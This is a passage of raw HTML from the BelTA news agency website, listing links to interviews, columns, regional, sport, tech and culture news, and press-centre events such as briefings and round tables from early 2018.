                                                     	    	    	                <a href="http://www.belta.by/interview/view/v-tvorchestve-nikogda-ne-pozvoljaju-zakryt-glaza-dazhe-na-melochi-6034/"  title="В творчестве никогда не позволяю закрыть глаза даже на мелочи" class="press_wrap_title">
                            <span class="press_img"><img src="http://www.belta.by/images/storage/person/thumb/000057_56098.jpg" alt="В творчестве никогда не позволяю закрыть глаза даже на мелочи" title="В творчестве никогда не позволяю закрыть глаза даже на мелочи"/><span class="press_rubric">Интервью</span></span>
                        <span>Гюнешь Абасова</span>В творчестве никогда не позволяю закрыть глаза даже на мелочи
            </a>
                                 	    	    	                <a href="http://www.belta.by/interview/view/voshischajus-geroizmom-belorusskogo-naroda-i-ego-vkladom-v-mirovuju-istoriju-6033/"  title="Восхищаюсь героизмом белорусского народа и его вкладом в мировую историю" class="press_wrap_title">
                            <span class="press_img"><img src="http://www.belta.by/images/storage/person/thumb/000057_131106.jpg" alt="Восхищаюсь героизмом белорусского народа и его вкладом в мировую историю" title="Восхищаюсь героизмом белорусского народа и его вкладом в мировую историю"/><span class="press_rubric">Интервью</span></span>
                        <span>Карлос Ларреа Давила</span>Восхищаюсь героизмом белорусского народа и его вкладом в мировую историю
            </a>
                                 	    	    	                <a href="http://www.belta.by/interview/view/obschestvo-stalo-bolee-informirovannym-v-voprosah-trudovoj-migratsii-6032/"  title="Общество стало более информированным в вопросах трудовой миграции" class="press_wrap_title">
                            <span class="press_img"><img src="http://www.belta.by/images/storage/person/thumb/000057_28919.jpg" alt="Общество стало более информированным в вопросах трудовой миграции" title="Общество стало более информированным в вопросах трудовой миграции"/><span class="press_rubric">Интервью</span></span>
                        <span>Лариса Истомова</span>Общество стало более информированным в вопросах трудовой миграции
            </a>
                                 	    	    	                <a href="http://www.belta.by/interview/view/ob-uspehah-v-borbe-s-korruptsiej-razoblachenii-shpionov-i-unikalnoj-sisteme-pravitelstvennoj-svjazi-6031/"  title="Об успехах в борьбе с коррупцией, разоблачении шпионов и уникальной системе правительственной связи" class="press_wrap_title">
                            <span class="press_img"><img src="http://www.belta.by/images/storage/person/thumb/000057_653861.jpg" alt="Об успехах в борьбе с коррупцией, разоблачении шпионов и уникальной системе правительственной связи" title="Об успехах в борьбе с коррупцией, разоблачении шпионов и уникальной системе правительственной связи"/><span class="press_rubric">Интервью</span></span>
                        <span>Валерий Вакульчик</span>Об успехах в борьбе с коррупцией, разоблачении шпионов и уникальной системе правительственной связи
            </a>
                                 	    	    	                <a href="http://www.belta.by/interview/view/v-belarusi-razvivaetsja-unikalnaja-sistema-sudebnoj-ekspertizy-6028/"  title="В Беларуси развивается уникальная система судебной экспертизы" class="press_wrap_title">
                            <span class="press_img"><img src="http://www.belta.by/images/storage/opinion/thumb/000053_852745.jpg" alt="В Беларуси развивается уникальная система судебной экспертизы" title="В Беларуси развивается уникальная система судебной экспертизы"/><span class="press_rubric">Интервью</span></span>
                        <span>Андрей Швед</span>В Беларуси развивается уникальная система судебной экспертизы
            </a>
                    
                </div>
	                		                                                                                    <div class="press_wrap" id="op_282_info">
                    <div class="press_all"><a href="/columnists/" title="Колумнисты. Все">Колумнисты. Все</a></div>
                                                     	    	    	                <a href="http://www.belta.by/columnists/view/ne-nado-plakatsja-zhitie-moe-6012/"  title="Не надо плакаться &quot;житие мое&quot;..." class="press_wrap_title">
                            <span class="press_img"><img src="http://www.belta.by/images/storage/opinion/thumb/000176_334558.jpg" alt="Не надо плакаться &quot;житие мое&quot;..." title="Не надо плакаться &quot;житие мое&quot;..."/><span class="press_rubric">Колумнисты</span></span>
                        <span>Елена Еловик</span>Не надо плакаться "житие мое"...
            </a>
                                 	    	    	                <a href="http://www.belta.by/columnists/view/v-zapase-god-vybiraem-svoj-status-6007/"  title="В запасе год: выбираем свой статус" class="press_wrap_title">
                            <span class="press_img"><img src="http://www.belta.by/images/storage/person/thumb/000057_211487.jpg" alt="В запасе год: выбираем свой статус" title="В запасе год: выбираем свой статус"/><span class="press_rubric">Колумнисты</span></span>
                        <span>Дмитрий Шамко</span>В запасе год: выбираем свой статус
            </a>
                                 	    	    	                <a href="http://www.belta.by/columnists/view/otkushu-sebe-palets-5901/"  title="Откушу себе палец...?" class="press_wrap_title">
                            <span class="press_img"><img src="http://www.belta.by/images/storage/opinion/thumb/000176_431756.jpg" alt="Откушу себе палец...?" title="Откушу себе палец...?"/><span class="press_rubric">Колумнисты</span></span>
                        <span>Дмитрий Шамко</span>Откушу себе палец...?
            </a>
                                 	    	    	                <a href="http://www.belta.by/columnists/view/odin-bolshe-sta-tysjach-5874/"  title="Один – больше ста тысяч?" class="press_wrap_title">
                            <span class="press_img"><img src="http://www.belta.by/images/storage/opinion/thumb/000176_276819.jpg" alt="Один – больше ста тысяч?" title="Один – больше ста тысяч?"/><span class="press_rubric">Колумнисты</span></span>
                        <span>Дмитрий Шамко</span>Один – больше ста тысяч?
            </a>
                                 	    	    	                <a href="http://www.belta.by/columnists/view/doing-business-pospeshaj-ne-toropjas-5846/"  title="Doing Business: поспешай не торопясь" class="press_wrap_title">
                            <span class="press_img"><img src="http://www.belta.by/images/storage/opinion/thumb/000176_289230.jpg" alt="Doing Business: поспешай не торопясь" title="Doing Business: поспешай не торопясь"/><span class="press_rubric">Колумнисты</span></span>
                        <span>Юлия Дыленок</span>Doing Business: поспешай не торопясь
            </a>
                    
                </div>
	                <div class="press_wrap press_wrap_active" id="op_0_info">
                                             	    	    	                <a href="/interview/view/ob-uspehah-v-borbe-s-korruptsiej-razoblachenii-shpionov-i-unikalnoj-sisteme-pravitelstvennoj-svjazi-6031/"  title="Об успехах в борьбе с коррупцией, разоблачении шпионов и уникальной системе правительственной связи" class="press_wrap_title">
                            <span class="press_img"><img src="http://www.belta.by/images/storage/person/thumb/000057_653861.jpg" alt="Об успехах в борьбе с коррупцией, разоблачении шпионов и уникальной системе правительственной связи" title="Об успехах в борьбе с коррупцией, разоблачении шпионов и уникальной системе правительственной связи"/><span class="press_rubric">Интервью</span></span>
                        <span>Валерий Вакульчик</span>Об успехах в борьбе с коррупцией, разоблачении шпионов и уникальной системе правительственной связи
            </a>
                                 	    	    	                <a href="/opinions/view/zakon-ob-informatsii-neobhodimo-sovershenstvovat-6035/"  title="Закон об информации необходимо совершенствовать" class="press_wrap_title">
                            <span class="press_img"><img src="http://www.belta.by/images/storage/person/thumb/000057_208137.jpg" alt="Закон об информации необходимо совершенствовать" title="Закон об информации необходимо совершенствовать"/><span class="press_rubric">Мнения</span></span>
                        <span>Вадим Ипатов</span>Закон об информации необходимо совершенствовать
            </a>
                                 	    	    	                <a href="/interview/view/voshischajus-geroizmom-belorusskogo-naroda-i-ego-vkladom-v-mirovuju-istoriju-6033/"  title="Восхищаюсь героизмом белорусского народа и его вкладом в мировую историю" class="press_wrap_title">
                            <span class="press_img"><img src="http://www.belta.by/images/storage/person/thumb/000057_131106.jpg" alt="Восхищаюсь героизмом белорусского народа и его вкладом в мировую историю" title="Восхищаюсь героизмом белорусского народа и его вкладом в мировую историю"/><span class="press_rubric">Интервью</span></span>
                        <span>Карлос Ларреа Давила</span>Восхищаюсь героизмом белорусского народа и его вкладом в мировую историю
            </a>
                                 	    	    	                <a href="/interview/view/v-tvorchestve-nikogda-ne-pozvoljaju-zakryt-glaza-dazhe-na-melochi-6034/"  title="В творчестве никогда не позволяю закрыть глаза даже на мелочи" class="press_wrap_title">
                            <span class="press_img"><img src="http://www.belta.by/images/storage/person/thumb/000057_56098.jpg" alt="В творчестве никогда не позволяю закрыть глаза даже на мелочи" title="В творчестве никогда не позволяю закрыть глаза даже на мелочи"/><span class="press_rubric">Интервью</span></span>
                        <span>Гюнешь Абасова</span>В творчестве никогда не позволяю закрыть глаза даже на мелочи
            </a>
                                 	    	    	                <a href="/interview/view/obschestvo-stalo-bolee-informirovannym-v-voprosah-trudovoj-migratsii-6032/"  title="Общество стало более информированным в вопросах трудовой миграции" class="press_wrap_title">
                            <span class="press_img"><img src="http://www.belta.by/images/storage/person/thumb/000057_28919.jpg" alt="Общество стало более информированным в вопросах трудовой миграции" title="Общество стало более информированным в вопросах трудовой миграции"/><span class="press_rubric">Интервью</span></span>
                        <span>Лариса Истомова</span>Общество стало более информированным в вопросах трудовой миграции
            </a>

        </div>
</div>
</div>
            <div class="table_1200">
            
                                    <div class="sp_rubric_block">
    <div class="sp_rb_title"><a href="http://www.belta.by/regions/" title="Регионы">Регионы</a></div>
    <div class="sp_rb_content">
<div class="sp_rb_main_item">
	    	    	     	<a href="http://www.belta.by/regions/view/reportazh-glavnoe-ljudjam-pomoch-288058-2018/"  title="РЕПОРТАЖ: Главное - людям помочь" >
            <img src="http://www.belta.by/images/storage/news/000023_1517848831_small.jpg" alt="" title=""/>
    </a>
<a href="http://www.belta.by/regions/view/reportazh-glavnoe-ljudjam-pomoch-288058-2018/"  title="РЕПОРТАЖ: Главное - людям помочь">
    РЕПОРТАЖ: Главное - людям помочь
     
    </a>
</div>
<div class="sp_rb_items">
	          	           	        <div class="sp_rb_item">
	<a href="http://www.belta.by/regions/view/v-bobrujske-na-mostu-cherez-berezinu-ogranichili-dvizhenie-bolshegruzov-288052-2018/"  title="В Бобруйске на мосту через Березину ограничили движение большегрузов">
            В Бобруйске на мосту через Березину ограничили движение большегрузов
             
            	</a>
        
    </div>
	          	           	        <div class="sp_rb_item">
	<a href="http://www.belta.by/regions/view/vrp-minska-v-2017-godu-uvelichilsja-na-3-288013-2018/"  title="ВРП Минска в 2017 году увеличился на 3%">
            ВРП Минска в 2017 году увеличился на 3%
             
            	</a>
        
    </div>
</div>
</div>
</div>

                
            
                                    <div class="sp_rubric_block">
    <div class="sp_rb_title"><a href="http://www.belta.by/sport/" title="Спорт">Спорт</a></div>
    <div class="sp_rb_content">
<div class="sp_rb_main_item">
	    	    	     	<a href="http://www.belta.by/sport/view/anastasija-veremeenko-i-elena-levchenko-pribyli-v-trenirovochnyj-lager-basketbolnoj-sbornoj-288032-2018/"  title="Анастасия Веремеенко и Елена Левченко прибыли в тренировочный лагерь баскетбольной сборной" >
            <img src="http://www.belta.by/images/storage/news/000028_1517838145_small.jpg" alt="Елена Левченко. Фото из архива" title="Елена Левченко. Фото из архива"/>
    </a>
<a href="http://www.belta.by/sport/view/anastasija-veremeenko-i-elena-levchenko-pribyli-v-trenirovochnyj-lager-basketbolnoj-sbornoj-288032-2018/"  title="Анастасия Веремеенко и Елена Левченко прибыли в тренировочный лагерь баскетбольной сборной">
    Анастасия Веремеенко и Елена Левченко прибыли в тренировочный лагерь баскетбольной сборной
     
    </a>
</div>
<div class="sp_rb_items">
	          	           	        <div class="sp_rb_item">
	<a href="http://www.belta.by/sport/view/kapitan-hk-dinamo-minsk-vladimir-denisov-vyveden-iz-spiska-travmirovannyh-288066-2018/"  title="Капитан ХК &quot;Динамо-Минск&quot; Владимир Денисов выведен из списка травмированных">
            Капитан ХК "Динамо-Минск" Владимир Денисов выведен из списка травмированных
             
            	</a>
        
    </div>
	          	           	        <div class="sp_rb_item">
	<a href="http://www.belta.by/sport/view/futbolisty-soligorskogo-shahtera-sygrali-vnichjju-brestskoe-dinamo-proigralo-svoj-sparring-288063-2018/"  title="Футболисты солигорского &quot;Шахтера&quot; сыграли вничью, брестское &quot;Динамо&quot; проиграло свой спарринг">
            Футболисты солигорского "Шахтера" сыграли вничью, брестское "Динамо" проиграло свой спарринг
             
            	</a>
        
    </div>
</div>
</div>
</div>

                
            
                                    <div class="sp_rubric_block">
    <div class="sp_rb_title"><a href="http://www.belta.by/tech/" title="Технологии">Технологии</a></div>
    <div class="sp_rb_content">
<div class="sp_rb_main_item">
	    	    	     	<a href="http://www.belta.by/tech/view/big-data-i-innovatsionnye-servisy-dlja-biznesa-kompanija-delovaja-set-oboznachila-strategicheskie-288033-2018/"  title="Big Data и инновационные сервисы для бизнеса: компания &quot;Деловая сеть&quot; обозначила стратегические приоритеты" >
            <img src="http://www.belta.by/images/storage/news/000025_1517838106_small.jpg" alt="" title=""/>
    </a>
<a href="http://www.belta.by/tech/view/big-data-i-innovatsionnye-servisy-dlja-biznesa-kompanija-delovaja-set-oboznachila-strategicheskie-288033-2018/"  title="Big Data и инновационные сервисы для бизнеса: компания &quot;Деловая сеть&quot; обозначила стратегические приоритеты">
    Big Data и инновационные сервисы для бизнеса: компания "Деловая сеть" обозначила стратегические приоритеты
     
    </a>
</div>
<div class="sp_rb_items">
	          	           	        <div class="sp_rb_item">
	<a href="http://www.belta.by/tech/view/u-iphone-x-obnaruzhili-novyj-defekt-288068-2018/"  title="У iPhone X обнаружили новый дефект">
            У iPhone X обнаружили новый дефект
             
            	</a>
        
    </div>
	          	           	        <div class="sp_rb_item">
	<a href="http://www.belta.by/tech/view/boeing-predstavil-samolet-novogo-pokolenija-iz-serii-737-max-288059-2018/"  title="Boeing представил самолет нового поколения из серии 737 MAX">
            Boeing представил самолет нового поколения из серии 737 MAX
             
            	</a>
        
    </div>
</div>
</div>
</div>

                
            
                                    <div class="sp_rubric_block">
    <div class="sp_rb_title"><a href="http://www.belta.by/culture/" title="Культура">Культура</a></div>
    <div class="sp_rb_content">
<div class="sp_rb_main_item">
	    	    	     	<a href="http://www.belta.by/culture/view/fotofakt-jubilejnaja-vystavka-leonida-schemeleva-otkrylas-v-natsionalnom-hudozhestvennom-muzee-288056-2018/"  title="ФОТОФАКТ: Юбилейная выставка Леонида Щемелева открылась в Национальном художественном музее" >
            <img src="http://www.belta.by/images/storage/news/000027_1517847384_small.jpg" alt="Леонид Щемелев" title="Леонид Щемелев"/>
    </a>
<a href="http://www.belta.by/culture/view/fotofakt-jubilejnaja-vystavka-leonida-schemeleva-otkrylas-v-natsionalnom-hudozhestvennom-muzee-288056-2018/"  title="ФОТОФАКТ: Юбилейная выставка Леонида Щемелева открылась в Национальном художественном музее">
    ФОТОФАКТ: Юбилейная выставка Леонида Щемелева открылась в Национальном художественном музее
     
    </a>
</div>
<div class="sp_rb_items">
	          	           	        <div class="sp_rb_item">
	<a href="http://www.belta.by/culture/view/junye-vokalisty-minskoj-oblasti-projavjat-svoi-talanty-na-festivale-konkurse-prostoj-motiv-288069-2018/"  title="Юные вокалисты Минской области проявят свои таланты на фестивале-конкурсе &quot;Простой мотив&quot;">
            Юные вокалисты Минской области проявят свои таланты на фестивале-конкурсе "Простой мотив"
             
            	</a>
        
    </div>
	          	           	        <div class="sp_rb_item">
	<a href="http://www.belta.by/culture/view/depeche-mode-vystupit-v-minske-13-fevralja-288048-2018/"  title="Depeche Mode выступит в Минске 13 февраля">
            Depeche Mode выступит в Минске 13 февраля
             
            	</a>
        
    </div>
</div>
</div>
</div>

                
            
                                    <div class="sp_rubric_block">
    <div class="sp_rb_title"><a href="http://www.belta.by/kaleidoscope/" title="Калейдоскоп">Калейдоскоп</a></div>
    <div class="sp_rb_content">
<div class="sp_rb_main_item">
	    	    	     	<a href="http://www.belta.by/kaleidoscope/view/belorus-mihail-sosunov-proshel-v-ukrainskij-golos-287935-2018/"  title="Белорус Михаил Сосунов прошел в украинский &quot;Голос&quot;" >
            <img src="http://www.belta.by/images/storage/news/000029_1517816169_small.jpg" alt="Михаил Сосунов" title="Михаил Сосунов"/>
    </a>
<a href="http://www.belta.by/kaleidoscope/view/belorus-mihail-sosunov-proshel-v-ukrainskij-golos-287935-2018/"  title="Белорус Михаил Сосунов прошел в украинский &quot;Голос&quot;">
    Белорус Михаил Сосунов прошел в украинский "Голос"
     
    </a>
</div>
<div class="sp_rb_items">
	          	           	        <div class="sp_rb_item">
	<a href="http://www.belta.by/kaleidoscope/view/akter-aleksej-panin-lishilsja-mashiny-za-dolgi-288074-2018/"  title="Актер Алексей Панин лишился машины за долги">
            Актер Алексей Панин лишился машины за долги
             
            	</a>
        
    </div>
	          	           	        <div class="sp_rb_item">
	<a href="http://www.belta.by/kaleidoscope/view/andzhelina-dzholi-pojavilas-na-krasnoj-dorozhke-prestizhnoj-premii-s-dochermi-288073-2018/"  title="Анджелина Джоли появилась на красной дорожке престижной премии с дочерьми">
            Анджелина Джоли появилась на красной дорожке престижной премии с дочерьми
             
            <span class="with_photo"></span>	</a>
        
    </div>
</div>
</div>
</div>

                
            
                </div>


<div class="press_block" id="press_center">
<div class="press_block_titles" id="press_titles">
    <div id="pr_0" class="press_block_title_active"><a onclick="return change_press('pr_0')" title="Пресс-центр">Пресс-центр</a></div>
            <div id="pr_141"><a onclick="return change_press('pr_141')"  href="http://www.belta.by/onlineconference/" title="Онлайн-конференция">Онлайн-конференция</a></div>
                                                <div id="pr_142"><a onclick="return change_press('pr_142')"  href="http://www.belta.by/briefing/" title="Брифинг">Брифинг</a></div>
                                                <div id="pr_143"><a onclick="return change_press('pr_143')"  href="http://www.belta.by/roundtable/" title="Круглый стол">Круглый стол</a></div>
                                                <div id="pr_144"><a onclick="return change_press('pr_144')"  href="http://www.belta.by/pressconference/" title="Пресс-конференция">Пресс-конференция</a></div>
                    </div>
<div class="clear"></div>
<div class="press_content">
        					                                                                                    <div class="press_wrap" id="pr_141_info">
                    <div class="press_all"><a href="/onlineconference/" title="Все онлайн конференции">Все онлайн конференции</a></div>
                                                                                                  <a href="http://www.belta.by/onlineconference/view/deklarirovanie-dohodov-grazhdan-1013/" title="Декларирование доходов граждан" class="press_wrap_title">            
            
                                    
                                                                                                                                                                                
                                        <span class="press_img"><img src="http://www.belta.by/images/storage/presscenter/000093_1517820692_small.jpg" title="Декларирование доходов граждан"/>
                    <span class="press_rubric">Онлайн-конференция</span>
                </span>
                                                                                
                <span> Андрей Ковалевский</span>
                <span class="press_date "> 7 февраля, 11:00</span>
                Декларирование доходов граждан       
                <span class="clear"></span>
            </a>
                                            
                                                            <a href="http://www.belta.by/onlineconference/view/mestnye-vybory-2018-1008/" title="Местные выборы-2018" class="press_wrap_title">            
            
                                    
                                                                                                                                                                                
                                        <span class="press_img"><img src="http://www.belta.by/images/storage/presscenter/000093_1516358016_small.jpg" title="Местные выборы-2018"/>
                    <span class="press_rubric">Онлайн-конференция</span>
                </span>
                                                                                
                <span> Лидия Ермошина</span>
                <span class="press_date ">22 января</span>
                Местные выборы-2018       
                <span class="clear"></span>
            </a>
                                            
                                                            <a href="http://www.belta.by/onlineconference/view/realizatsija-programmy-podgotovki-kadrov-dlja-atomnoj-otrasli-belarusi-1003/" title="Реализация программы подготовки кадров для атомной отрасли Беларуси" class="press_wrap_title">            
            
                                    
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        
                                        <span class="press_img"><img src="http://www.belta.by/images/storage/presscenter/000093_1512380736_small.jpg" title="Реализация программы подготовки кадров для атомной отрасли Беларуси"/>
                    <span class="press_rubric">Онлайн-конференция</span>
                </span>
                                                                                
                <span> Александр Ерин,<br/> Александр Воробьев,<br/> Елена Живицкая,<br/> Виктор Анищик,<br/> Николай Карницкий,<br/> Валерий Карезин</span>
                <span class="press_date "> 6 декабря</span>
                Реализация программы подготовки кадров для атомной отрасли Беларуси       
                <span class="clear"></span>
            </a>
                                            
                                                            <a href="http://www.belta.by/onlineconference/view/nalog-na-pribyl-otrazhenie-rashodov-po-kontroliruemoj-zadolzhennosti-1000/" title="Налог на прибыль: отражение расходов по контролируемой задолженности" class="press_wrap_title">            
            
                                    
                                                                                                                                                                                
                                        <span class="press_img"><img src="http://www.belta.by/images/storage/presscenter/000093_1511786462_small.jpg" title="Налог на прибыль: отражение расходов по контролируемой задолженности"/>
                    <span class="press_rubric">Онлайн-конференция</span>
                </span>
                                                                                
                <span> Наталия Долгова</span>
                <span class="press_date ">29 ноября</span>
                Налог на прибыль: отражение расходов по контролируемой задолженности       
                <span class="clear"></span>
            </a>
                                            
                                                            <a href="http://www.belta.by/onlineconference/view/finansovyj-rynok-belarusi-vozmozhnosti-dlja-chastnogo-investora-995/" title="Финансовый рынок Беларуси: возможности для частного инвестора" class="press_wrap_title">            
            
                                    
                                                                                                                                                                                
                                        <span class="press_img"><img src="http://www.belta.by/images/storage/presscenter/000093_1510903712_small.jpg" title="Финансовый рынок Беларуси: возможности для частного инвестора"/>
                    <span class="press_rubric">Онлайн-конференция</span>
                </span>
                                                                                
                <span> Александр Сабодин</span>
                <span class="press_date ">22 ноября</span>
                Финансовый рынок Беларуси: возможности для частного инвестора       
                <span class="clear"></span>
            </a>
                                            

                </div>
					                                                                                    <div class="press_wrap" id="pr_142_info">
                    <div class="press_all"><a href="/briefing/" title="Все брифинги">Все брифинги</a></div>
                                                                                                  <a href="http://www.belta.by/briefing/view/zasedanie-parlamentskoj-assamblei-tsei-povestka-dnja-996/" title="Заседание Парламентской ассамблеи ЦЕИ: повестка дня" class="press_wrap_title">            
            
                                    
                                                                                                                                                                                                                                                                                                        
                                        <span class="press_img"><img src="http://www.belta.by/images/storage/presscenter/000099_1511335607_small.jpg" title="Заседание Парламентской ассамблеи ЦЕИ: повестка дня"/>
                    <span class="press_rubric">Брифинг</span>
                </span>
                                                                                
                <span> Ирина Старовойтова,<br/> Сергей Рахманов</span>
                <span class="press_date ">23 ноября</span>
                Заседание Парламентской ассамблеи ЦЕИ: повестка дня       
                <span class="clear"></span>
            </a>
                                            
                                                            <a href="http://www.belta.by/briefing/view/stress-testy-belorusskoj-aes-pervye-itogi-991/" title="Стресс-тесты Белорусской АЭС: первые итоги" class="press_wrap_title">            
            
                                    
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        
                                        <span class="press_img"><img src="http://www.belta.by/images/storage/presscenter/000099_1509784512_small.jpg" title="Стресс-тесты Белорусской АЭС: первые итоги"/>
                    <span class="press_rubric">Брифинг</span>
                </span>
                                                                                
                <span> Ольга Луговская,<br/> Александр Трифонов,<br/> Аркадий Аронов,<br/> Александр Парфенов</span>
                <span class="press_date "> 8 ноября</span>
                Стресс-тесты Белорусской АЭС: первые итоги       
                <span class="clear"></span>
            </a>
                                            
                                                            <a href="http://www.belta.by/briefing/view/belorussko-indijskoe-delovoe-sotrudnichestvo-975/" title="Белорусско-индийское деловое сотрудничество" class="press_wrap_title">            
            
                                    
                                                                                                                                                                                
                                        <span class="press_img"><img src="http://www.belta.by/images/storage/presscenter/000099_33533_small.jpg" title="Белорусско-индийское деловое сотрудничество"/>
                    <span class="press_rubric">Брифинг</span>
                </span>
                                                                                
                <span> Владимир Улахович</span>
                <span class="press_date ">14 сентября</span>
                Белорусско-индийское деловое сотрудничество       
                <span class="clear"></span>
            </a>
                                            
                                                            <a href="http://www.belta.by/briefing/view/predvaritelnye-itogi-letnej-ozdorovitelnoj-kampanii-965/" title="Предварительные итоги летней оздоровительной кампании" class="press_wrap_title">            
            
                                    
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        
                                        <span class="press_img"><img src="http://www.belta.by/images/storage/presscenter/000099_115620_small.jpg" title="Предварительные итоги летней оздоровительной кампании"/>
                    <span class="press_rubric">Брифинг</span>
                </span>
                                                                                
                <span> Лариса Емельянчик,<br/> Анна Рысевец,<br/> Алексей Желенков,<br/> Надежда Онуфриева</span>
                <span class="press_date ">11 августа</span>
                Предварительные итоги летней оздоровительной кампании       
                <span class="clear"></span>
            </a>
                                            
                                                            <a href="http://www.belta.by/briefing/view/xix-vsemirnyj-kongress-russkoj-pressy-partnerstvo-vo-imja-buduschego-prioritety-sovremennoj-tsivilizatsii-956/" title="XIX Всемирный конгресс русской прессы &quot;Партнерство во имя будущего: приоритеты современной цивилизации&quot;" class="press_wrap_title">            
            
                                    
                                                                                                                                                                                
                                        <span class="press_img"><img src="http://www.belta.by/images/storage/presscenter/000099_819756_small.jpg" title="XIX Всемирный конгресс русской прессы &quot;Партнерство во имя будущего: приоритеты современной цивилизации&quot;"/>
                    <span class="press_rubric">Брифинг</span>
                </span>
                                                                                
                <span> Лилия Ананич</span>
                <span class="press_date ">10 июля</span>
                XIX Всемирный конгресс русской прессы "Партнерство во имя будущего: приоритеты современной цивилизации"       
                <span class="clear"></span>
            </a>
                                            

                </div>
					                                                                                    <div class="press_wrap" id="pr_143_info">
                    <div class="press_all"><a href="/roundtable/" title="Все круглые столы">Все круглые столы</a></div>
                                                                                                  <a href="http://www.belta.by/roundtable/view/byt-sobstvennikom-stat-hozjainom-kruglyj-stol-gazety-7-dnej-1010/" title="Быть собственником – стать хозяином. Круглый стол газеты &quot;7 дней&quot;" class="press_wrap_title">            
            
                                    
                                                                                                                                                                                                                                                                                                                                                                                                                                
                                        <span class="press_img"><img src="http://www.belta.by/images/storage/presscenter/000105_1516805866_small.jpg" title="Быть собственником – стать хозяином. Круглый стол газеты &quot;7 дней&quot;"/>
                    <span class="press_rubric">Круглый стол</span>
                </span>
                                                                                
                <span> Евгения Красуцкая,<br/> Геннадий Каленов,<br/> Владимир Устинович</span>
                <span class="press_date ">24 января</span>
                Быть собственником – стать хозяином. Круглый стол газеты "7 дней"       
                <span class="clear"></span>
            </a>
                                            
                                                            <a href="http://www.belta.by/roundtable/view/vozvraschenie-istoriko-kulturnyh-tsennostej-belarusi-realii-i-plany-1007/" title="Возвращение историко-культурных ценностей Беларуси: реалии и планы" class="press_wrap_title">            
            
                                    
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        
                                        <span class="press_img"><img src="http://www.belta.by/images/storage/presscenter/000105_1516092851_small.jpg" title="Возвращение историко-культурных ценностей Беларуси: реалии и планы"/>
                    <span class="press_rubric">Круглый стол</span>
                </span>
                                                                                
                <span> Лариса Бельская,<br/> Наталья Хвир,<br/> Ольга Попко,<br/> Владимир Прокопцов,<br/> Роман Мотульский,<br/> Алексей Батюков</span>
                <span class="press_date ">17 января</span>
                Возвращение историко-культурных ценностей Беларуси: реалии и планы       
                <span class="clear"></span>
            </a>
                                            
                                                            <a href="http://www.belta.by/roundtable/view/revoljutsionnye-novatsii-chto-izmenjat-dokumenty-po-razvitiju-predprinimatelstva-1001/" title="Революционные новации: что изменят документы по развитию предпринимательства?" class="press_wrap_title">            
            
                                    
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                
                                        <span class="press_img"><img src="http://www.belta.by/images/storage/presscenter/000105_1512053190_small.jpg" title="Революционные новации: что изменят документы по развитию предпринимательства?"/>
                    <span class="press_rubric">Круглый стол</span>
                </span>
                                                                                
                <span> Элла Селицкая,<br/> Дмитрий Семенкевич,<br/> Петр Арушаньянц,<br/> Андрей Матюшенко,<br/> Виолетта Брезовская,<br/> Вадим Ипатов,<br/> Жанна Тарасевич</span>
                <span class="press_date ">28 ноября</span>
                Революционные новации: что изменят документы по развитию предпринимательства?       
                <span class="clear"></span>
            </a>
                                            
                                                            <a href="http://www.belta.by/roundtable/view/megapolisy-v-dolgu-pered-prirodoj-kruglyj-stol-gazety-7-dnej-997/" title="Мегаполисы в долгу перед природой. Круглый стол газеты &quot;7 дней&quot;" class="press_wrap_title">            
            
                                    
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        
                                        <span class="press_img"><img src="http://www.belta.by/images/storage/presscenter/000105_1511417285_small.jpg" title="Мегаполисы в долгу перед природой. Круглый стол газеты &quot;7 дней&quot;"/>
                    <span class="press_rubric">Круглый стол</span>
                </span>
                                                                                
                <span> Марина Толстик,<br/> Руслан Михалевич,<br/> Игорь Капач,<br/> Татьяна Слиж,<br/> Светлана Костян,<br/> Снежана Дубенок,<br/> Дмитрий Плашков,<br/> Виталий Волчетский,<br/> Кирилл Антонов,<br/> Нина Кульбеда</span>
                <span class="press_date ">22 ноября</span>
                Мегаполисы в долгу перед природой. Круглый стол газеты "7 дней"       
                <span class="clear"></span>
            </a>
                                            
                                                            <a href="http://www.belta.by/roundtable/view/revoljutsija-1917-goda-vzgljad-cherez-stoletie-kruglyj-stol-gazety-7-dnej-990/" title="Революция 1917 года: взгляд через столетие. Круглый стол газеты &quot;7 дней&quot;" class="press_wrap_title">            
            
                                    
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                
                                        <span class="press_img"><img src="http://www.belta.by/images/storage/presscenter/000105_1509539525_small.jpg" title="Революция 1917 года: взгляд через столетие. Круглый стол газеты &quot;7 дней&quot;"/>
                    <span class="press_rubric">Круглый стол</span>
                </span>
                                                                                
                <span> Вадим Гигин,<br/> Виталий Мисевец,<br/> Тамара Вятская,<br/> Яков Алексейчик,<br/> Дмитрий Шамко</span>
                <span class="press_date "> 1 ноября</span>
                Революция 1917 года: взгляд через столетие. Круглый стол газеты "7 дней"       
                <span class="clear"></span>
            </a>
                                            

                </div>
					                                                                                    <div class="press_wrap" id="pr_144_info">
                    <div class="press_all"><a href="/pressconference/" title="Все пресс-конференции">Все пресс-конференции</a></div>
                                                                                                  <a href="http://www.belta.by/pressconference/view/informatsionnaja-bezopasnost-i-borba-s-prestuplenijami-v-sfere-vysokih-tehnologij-1012/" title="Информационная безопасность и борьба с преступлениями в сфере высоких технологий" class="press_wrap_title">            
            
                                    
                                                                                                                                                                                                                                                                                                                                                                                                                                
                                        <span class="press_img"><img src="http://www.belta.by/images/storage/presscenter/000106_1517477497_small.jpg" title="Информационная безопасность и борьба с преступлениями в сфере высоких технологий"/>
                    <span class="press_rubric">Пресс-конференция</span>
                </span>
                                                                                
                <span> Вадим Ипатов,<br/> Владимир Зайцев,<br/> Александр Мохнач</span>
                <span class="press_date "> 5 февраля</span>
                Информационная безопасность и борьба с преступлениями в сфере высоких технологий       
                <span class="clear"></span>
            </a>
                                            
                                                            <a href="http://www.belta.by/pressconference/view/sovremennye-metodiki-diagnostiki-i-lechenija-nevrologicheskih-i-nejrohirurgicheskih-zabolevanij-1011/" title="Современные методики диагностики и лечения неврологических и нейрохирургических заболеваний" class="press_wrap_title">            
            
                                    
